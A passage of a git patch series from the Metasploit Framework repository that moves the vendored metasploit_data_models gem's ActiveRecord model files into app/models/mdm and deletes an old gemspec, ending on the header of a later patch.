(100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/report.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/report_template.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/route.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/service.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/session.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/session_event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/task.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/user.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/vuln.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/vuln_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/vuln_detail.rb (100%) rename 
lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/vuln_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/web_form.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/web_page.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/web_site.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/web_vuln.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/wmap_request.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/wmap_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/workspace.rb (100%) delete mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models_live.gemspec
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.mdown b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.md
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.mdown
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.md
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/api_key.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/api_key.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/api_key.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/api_key.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/client.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/client.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/client.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/client.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/cred.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/cred_file.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/cred_file.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/cred_file.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/event.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/event.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/event.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploit_attempt.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/exploit_attempt.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploit_attempt.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/exploited_host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploited_host.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/exploited_host.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/exploited_host.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host_tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_tag.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host_tag.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_tag.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/imported_cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/imported_cred.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/imported_cred.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/imported_cred.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/listener.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/listener.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/listener.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/listener.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/loot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/loot.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/loot.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/loot.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/macro.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/macro.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/macro.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/macro.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/mod_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/mod_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/mod_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/mod_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_action.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_action.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_action.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_arch.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_arch.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_arch.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_author.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_author.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_author.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_mixin.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_mixin.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_mixin.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_platform.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_platform.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_platform.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_target.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_target.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_target.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/nexpose_console.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/nexpose_console.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/nexpose_console.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/nexpose_console.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/note.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/note.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/note.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/note.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/profile.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/profile.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/profile.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/profile.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/report.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/report.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/report_template.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report_template.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/report_template.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report_template.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/route.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/route.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/route.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/route.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/service.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/service.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/service.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/service.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/session.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/session.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/session_event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session_event.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/session_event.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session_event.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/tag.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/tag.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/tag.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/task.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/task.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/task.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/task.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/user.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/user.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/user.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_attempt.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_attempt.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_attempt.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_form.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_form.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_form.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_form.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_page.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_page.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_page.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_page.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_site.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_site.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_site.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_site.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_vuln.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/wmap_request.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_request.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/wmap_request.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_request.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/wmap_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_target.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/wmap_target.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_target.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/workspace.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/workspace.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models_live.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models_live.gemspec
deleted file mode 100644
index 1ad87bcca0..0000000000
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models_live.gemspec
+++ /dev/null
@@ -1,25 +0,0 @@
-# -*- encoding: utf-8 -*-
-$:.push File.expand_path("../lib", __FILE__)
-require "metasploit_data_models/version"
-
-Gem::Specification.new do |s|
- s.name = "metasploit_data_models"
- s.version = "0.0.2.43DEV" # This gemspec is linked to metasploit releases and follows trunk
- s.authors = ["Trevor Rosen"]
- s.email = ["trevor_rosen@rapid7.com"]
- s.homepage = ""
- s.summary = %q{Database code for MSF and Metasploit Pro}
- s.description = %q{Implements minimal ActiveRecord models and database helper code used in both the Metasploit Framework (MSF) and Metasploit commercial editions.}
-
- s.files = `git ls-files`.split("\n")
- s.test_files = `git ls-files -- {test,spec,features}/*`.split("\n")
- s.executables = `git ls-files -- bin/*`.split("\n").map{ |f| File.basename(f) }
- s.require_paths = ["lib"]
-
- # ---- Dependencies ----
- s.add_development_dependency "rspec"
- s.add_runtime_dependency "activerecord"
- s.add_runtime_dependency "activesupport"
- s.add_runtime_dependency "pg"
- s.add_runtime_dependency "pry"
-end
From a745c3a4a019a1c55178cf90fe1c63fc2d747395 Mon Sep 17 00:00:00 2001
From: Luke Imhoff Date: Thu, 1 Nov 2012 08:56:00 -0500 Subject: [PATCH 50/64] metasploit_data_models 0.3.0 installed in gemcache --- lib/gemcache/ruby/1.9.1/bin/mdm_console | 10 +- .../metasploit_data_models-0.3.0/.gitignore | 18 +- .../gems/metasploit_data_models-0.3.0/Gemfile | 6 + .../metasploit_data_models-0.3.0/README.md | 65 +- .../metasploit_data_models-0.3.0/Rakefile | 8 +- .../app/models/mdm/api_key.rb | 30 +- .../app/models/mdm/client.rb | 15 +- .../app/models/mdm/cred.rb | 148 ++- .../app/models/mdm/cred_file.rb | 12 +- .../app/models/mdm/event.rb | 36 +- .../app/models/mdm/exploit_attempt.rb | 20 +- .../app/models/mdm/exploited_host.rb | 18 +- .../app/models/mdm/host.rb | 1184 ++--------------- .../app/models/mdm/host_detail.rb | 21 +- .../app/models/mdm/host_tag.rb | 19 +- .../app/models/mdm/imported_cred.rb | 13 +- .../app/models/mdm/listener.rb | 30 +- .../app/models/mdm/loot.rb | 78 +- .../app/models/mdm/macro.rb | 25 +- .../app/models/mdm/mod_ref.rb | 7 +- .../app/models/mdm/module_action.rb | 23 +- .../app/models/mdm/module_arch.rb | 24 +- .../app/models/mdm/module_author.rb | 24 +- .../app/models/mdm/module_detail.rb | 124 +- .../app/models/mdm/module_mixin.rb | 24 +- .../app/models/mdm/module_platform.rb | 24 +- .../app/models/mdm/module_ref.rb | 24 +- .../app/models/mdm/module_target.rb | 24 +- .../app/models/mdm/nexpose_console.rb | 28 +- .../app/models/mdm/note.rb | 65 +- .../app/models/mdm/profile.rb | 13 +- .../app/models/mdm/ref.rb | 20 +- .../app/models/mdm/report.rb | 59 